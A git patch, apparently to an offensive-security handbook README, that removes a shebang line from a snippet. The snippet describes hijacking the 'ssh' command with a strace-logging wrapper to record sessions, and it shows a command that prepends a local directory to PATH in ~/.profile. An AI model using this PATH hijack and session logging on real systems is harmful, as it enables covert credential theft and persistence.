From f679c7e1690285a83596b2ed302751ab275dd17b Mon Sep 17 00:00:00 2001 From: SkyperTHC <5938498+SkyperTHC@users.noreply.github.com> Date: Sun, 14 Nov 2021 15:18:10 +0000 Subject: [PATCH] Update README.md --- README.md | 1 - 1 file changed, 1 deletion(-) diff --git a/README.md b/README.md index 6619167..25352c5 100644 --- a/README.md +++ b/README.md @@ -685,7 +685,6 @@ Even dirtier way in case */proc/sys/kernel/yama/ptrace_scope* is set to 1 (strac Create a wrapper script called 'ssh' that executes strace + ssh to log the session: ``` # Cut & Paste the following into a bash shell: -#! /bin/bash # Add a local path to the PATH variable so our 'ssh' is executed instead of the real ssh: echo 'PATH=~/.local/bin:$PATH #0xFD0E' >>~/.profile